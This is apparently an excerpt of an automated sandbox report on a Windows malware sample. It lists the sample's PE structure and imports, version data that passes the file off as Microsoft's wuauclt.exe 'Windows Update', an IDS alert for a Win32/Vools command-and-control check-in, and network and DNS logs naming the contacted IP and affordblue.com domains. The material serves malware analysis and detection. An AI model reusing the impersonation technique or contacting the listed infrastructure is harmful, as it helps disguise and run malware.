| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24000 | 0x3b8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25000 | 0x13bc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1eef0 | 0x38 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1ef28 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x19000 | 0x1f8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x170e5 | 0x17200 | False | 0.590329391892 | data | 6.67178289515 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0x19000 | 0x77b8 | 0x7800 | False | 0.48349609375 | data | 5.3021293732 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x21000 | 0x2f4c | 0x2600 | False | 0.224403782895 | data | 2.72374569026 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x24000 | 0x3b8 | 0x400 | False | 0.4140625 | data | 3.18607830821 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x25000 | 0x13bc | 0x1400 | False | 0.7955078125 | data | 6.54445825276 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_VERSION | 0x24060 | 0x358 | data | English | United States |
| DLL | Import |
|---|---|
| KERNEL32.dll | CreateProcessW, GetProcAddress, GetModuleFileNameA, FreeConsole, SetLastError, lstrlenA, lstrcatA, WaitForSingleObject, DecodePointer, CreateFileW, WriteConsoleW, GetModuleFileNameW, GetFileTime, GetTickCount, GetLastError, Sleep, ReleaseMutex, CreateMutexA, SetFileTime, DeleteFileA, GetSystemDirectoryA, CloseHandle, CreateFileA, WriteFile, GetFileSizeEx, ReadFile, LocalFree, LocalAlloc, lstrcpyA, SetFilePointerEx, HeapReAlloc, HeapSize, GetConsoleMode, GetConsoleCP, GetCurrentThreadId, FlushFileBuffers, GetProcessHeap, SetStdHandle, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, EncodePointer, RaiseException, RtlUnwind, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetStdHandle, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetACP, HeapFree, HeapAlloc, CompareStringW, LCMapStringW, GetFileType, GetStringTypeW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP |
| USER32.dll | wsprintfA, wsprintfW |
| ADVAPI32.dll | SystemFunction036, CryptImportKey, CreateServiceA, StartServiceA, RegCloseKey, RegQueryValueExA, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, CloseServiceHandle, OpenSCManagerA, QueryServiceStatusEx, OpenServiceA, CryptVerifySignatureA, CryptAcquireContextA, CryptCreateHash, CryptHashData, CryptDestroyHash, CryptReleaseContext |
| WS2_32.dll | inet_ntoa, WSAStartup, gethostbyname, gethostname |
| IPHLPAPI.DLL | GetAdaptersInfo |
| WININET.dll | InternetCloseHandle, InternetOpenA, HttpSendRequestA, HttpOpenRequestA, HttpQueryInfoA, InternetConnectA, InternetReadFile, InternetSetOptionA |
| Description | Data |
|---|---|
| LegalCopyright | Microsoft Corporation. All rights reserved. |
| InternalName | wuauclt.exe |
| FileVersion | 6.3.9600.16384 |
| CompanyName | Microsoft Corporation |
| ProductName | Microsoft Windows Operating System |
| ProductVersion | 6.3.9600.16384 |
| FileDescription | Windows Update |
| OriginalFilename | wuauclt.exe |
| Translation | 0x0409 0x04b0 |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 02/23/22-03:17:18.386658 | TCP | 2027470 | ET TROJAN Win32/Vools Variant CnC Checkin | 49766 | 80 | 192.168.2.4 | 72.52.178.23 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Feb 23, 2022 03:18:20.431477070 CET535006772.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:20.947608948 CET5006753192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:21.076937914 CET535006772.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:21.760030031 CET5006753192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:21.888803959 CET535006772.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:27.652820110 CET5006957084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:27.652868032 CET5708450069192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:28.225219965 CET5009453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:28.262130976 CET5006957084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:28.262198925 CET5708450069192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:28.354655981 CET535009472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:28.948153973 CET5009453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:28.948203087 CET5006957084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:28.948260069 CET5708450069192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:29.077429056 CET535009472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:29.760965109 CET5009453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:29.890969038 CET535009472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:35.967782021 CET5012153192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:36.094007015 CET535012172.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:36.745683908 CET5012153192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:36.871885061 CET535012172.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:37.558223009 CET5012153192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:37.684542894 CET535012172.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:38.221967936 CET5012357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:38.221993923 CET5708450123192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:38.761434078 CET5012357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:38.761467934 CET5708450123192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:39.261511087 CET5012357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:39.261568069 CET5708450123192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:43.239773989 CET5018353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:43.372785091 CET535018372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:43.949393988 CET5018353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:44.082814932 CET535018372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:44.762001991 CET5018353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:44.895092010 CET535018372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:47.372736931 CET5018557084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:47.372792959 CET5708450185192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:48.050718069 CET5018557084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:48.050770044 CET5708450185192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:48.559534073 CET5018557084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:18:48.559581041 CET5708450185192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:18:50.304271936 CET5024353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:50.435965061 CET535024372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:50.949945927 CET5024353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:51.081692934 CET535024372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:51.762614012 CET5024353192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:51.894412041 CET535024372.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:57.762026072 CET5024453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:57.893071890 CET535024472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:58.450632095 CET5024453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:58.581794977 CET535024472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:59.263154030 CET5024453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:59.394721031 CET535024472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:19:02.396095037 CET5024857084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:02.396131039 CET5708450248192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:19:03.025742054 CET5024857084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:03.025808096 CET5708450248192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:19:03.560457945 CET5024857084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:03.560497046 CET5708450248192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:19:05.011569023 CET5027553192.168.2.472.52.178.23
                                              Feb 23, 2022 03:19:05.142196894 CET535027572.52.178.23192.168.2.4
                                              Feb 23, 2022 03:19:05.763787985 CET5027553192.168.2.472.52.178.23
                                              Feb 23, 2022 03:19:05.894387007 CET535027572.52.178.23192.168.2.4
                                              Feb 23, 2022 03:19:06.451615095 CET5027553192.168.2.472.52.178.23
                                              Feb 23, 2022 03:19:06.582133055 CET535027572.52.178.23192.168.2.4
                                              Feb 23, 2022 03:19:14.546950102 CET5031357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:14.547003031 CET5708450313192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:19:15.061358929 CET5031357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:15.061400890 CET5708450313192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:19:15.561445951 CET5031357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:15.561503887 CET5708450313192.168.2.1192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Feb 23, 2022 03:17:58.404800892 CET53550118.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:58.405155897 CET53571988.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:00.141848087 CET6087553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:00.160676956 CET5513453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:00.162467003 CET53608758.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:00.163531065 CET5369553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:00.181740999 CET53551348.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:00.182641029 CET53536958.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:03.827583075 CET5097553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:03.849165916 CET53509758.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:04.099941969 CET6546053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:04.117537022 CET53654608.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:04.414279938 CET6366953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:04.435612917 CET53636698.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:05.037002087 CET5165353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:05.038283110 CET5647353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:05.039335966 CET6145453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:05.058576107 CET53516538.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:05.059412003 CET53564738.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:05.060012102 CET53614548.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:06.017699957 CET5432353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:06.037640095 CET53543238.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:06.550318956 CET5996053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:06.571711063 CET53599608.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:06.593893051 CET5020553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:06.615320921 CET53502058.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:07.399161100 CET5089653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:07.420618057 CET53508968.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:07.498773098 CET5915153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:07.519898891 CET53591518.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:09.242543936 CET5616353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:09.245345116 CET5718653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:09.246047020 CET6112553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:09.261521101 CET53561638.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:09.266479969 CET53571868.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:09.266515970 CET53611258.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:09.918097973 CET6122753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:09.921276093 CET5467653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:09.939625025 CET53612278.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:09.941704035 CET53546768.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:10.037482023 CET6503053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:10.057305098 CET53650308.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:11.689815044 CET6174053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:11.693098068 CET5970853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:11.714039087 CET53597088.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:11.725672007 CET5404453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:11.731580019 CET53617408.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:11.747415066 CET53540448.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:11.748645067 CET5693253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:11.767764091 CET53569328.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:12.471340895 CET5781753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:12.492397070 CET53578178.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:12.551088095 CET5955653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:12.552077055 CET5754053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:12.570761919 CET53575408.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:12.572078943 CET53595568.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:13.392081976 CET6233753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:13.393547058 CET5755053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:13.394527912 CET6352353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:13.413957119 CET53623378.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:13.414499044 CET53575508.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:13.415365934 CET53635238.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:14.496077061 CET5950153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:14.518726110 CET6003353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:14.521399021 CET6214253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:14.538268089 CET53595018.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:14.539995909 CET53600338.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:14.542396069 CET53621428.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:15.163290977 CET5470553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:15.164768934 CET5476953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:15.165318966 CET6008253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:15.184832096 CET53547058.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:15.186371088 CET53547698.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:15.186562061 CET53600828.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:17.126071930 CET6024053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:17.147473097 CET53602408.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:17.194529057 CET5953253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:17.195451975 CET5093153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:17.215998888 CET53595328.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:17.216214895 CET53509318.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:20.154019117 CET5656753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:20.171061993 CET53565678.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:22.863518953 CET5951053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:22.864291906 CET6279353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:22.884829044 CET53595108.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:22.884872913 CET53627938.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:25.210112095 CET5109053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:25.229743004 CET53510908.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:26.736507893 CET5752753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:26.757709980 CET53575278.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:26.804306984 CET5589053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:26.805155993 CET5104253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:26.823673010 CET53510428.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:26.825092077 CET53558908.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:28.193944931 CET4937353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:28.223310947 CET53493738.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:28.833328009 CET5238753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:28.836766958 CET5025853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:28.852556944 CET53523878.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:28.855278015 CET53502588.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:30.769023895 CET5279253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:30.772142887 CET5491753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:30.789793968 CET53527928.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:30.793885946 CET53549178.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:32.875988960 CET6506453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:32.922066927 CET53650648.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:35.259838104 CET4990253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:35.260540009 CET5899653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:35.279433012 CET53499028.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:35.281928062 CET53589968.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:35.923979998 CET5456653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:35.943134069 CET53545668.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:37.243433952 CET5514253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:37.265104055 CET53551428.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:38.890449047 CET5458853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:38.893395901 CET5047153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:38.894129992 CET5027253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:38.910829067 CET53545888.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:38.913140059 CET53502728.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:38.916469097 CET53504718.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:41.081799030 CET5395653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:41.103137016 CET53539568.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:43.187747955 CET6350353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:43.236373901 CET53635038.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:44.117515087 CET5969053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:44.138596058 CET53596908.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:45.768086910 CET4999153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:45.789375067 CET53499918.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:47.414551973 CET5197153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:47.435741901 CET53519718.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:47.516845942 CET6545153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:47.538491011 CET53654518.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:49.579732895 CET6364353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:49.601452112 CET53636438.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:50.236934900 CET5483953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:50.255825996 CET53548398.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:51.621498108 CET5194153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:51.624475956 CET5943953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:51.625406027 CET5045053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:51.643297911 CET53519418.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:51.644985914 CET53594398.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:51.645889044 CET53504508.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:57.742340088 CET5949753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:57.759541988 CET53594978.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:58.243387938 CET5907353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:58.264429092 CET53590738.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:58.307921886 CET5041853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:58.329174042 CET53504188.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:59.776154995 CET5155653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:59.776232958 CET5532153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:59.777285099 CET6337053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:59.796046019 CET53515568.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:59.798703909 CET53633708.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:59.817965984 CET53553218.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:01.945007086 CET6411553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:01.946022987 CET4947253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:01.946749926 CET5732153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:01.964207888 CET53641158.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:01.966382980 CET53494728.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:01.988480091 CET53573218.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:04.486354113 CET6427153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:04.507318020 CET53642718.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:04.569201946 CET5522953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:04.572580099 CET5950053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:04.590143919 CET53552298.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:04.593180895 CET53595008.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:04.732263088 CET6497253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:04.851639986 CET53649728.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:07.665957928 CET5484253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:07.709629059 CET53548428.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:10.112005949 CET5401853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:10.112826109 CET6090253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:10.132747889 CET53540188.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:10.134022951 CET53609028.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:11.486414909 CET5908253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:11.488241911 CET6024153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:11.488588095 CET5552153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:11.507966995 CET53590828.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:11.508033991 CET53555218.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:11.509052038 CET53602418.8.8.8192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                              Feb 23, 2022 03:17:44.267355919 CET192.168.2.48.8.8.80x21eaStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:46.193627119 CET192.168.2.48.8.8.80xa7daStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:46.195482969 CET192.168.2.48.8.8.80x336eStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:46.196245909 CET192.168.2.48.8.8.80x5e49Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:47.249001026 CET192.168.2.48.8.8.80x69b5Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:47.281189919 CET192.168.2.48.8.8.80x4374Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:47.282283068 CET192.168.2.48.8.8.80xfdf3Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:47.936031103 CET192.168.2.48.8.8.80xbce3Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:48.725636959 CET192.168.2.48.8.8.80xe77Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:48.729209900 CET192.168.2.48.8.8.80xf198Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:48.731369972 CET192.168.2.48.8.8.80x9611Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:49.842408895 CET192.168.2.48.8.8.80xf0bdStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:49.843561888 CET192.168.2.48.8.8.80x2878Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:49.844214916 CET192.168.2.48.8.8.80xeff4Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:50.080027103 CET192.168.2.48.8.8.80xe71eStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:50.561095953 CET192.168.2.48.8.8.80xb3c6Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:50.594013929 CET192.168.2.48.8.8.80x5dcfStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:50.594844103 CET192.168.2.48.8.8.80x2210Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:52.410819054 CET192.168.2.48.8.8.80xf71eStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:52.722417116 CET192.168.2.48.8.8.80xd717Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
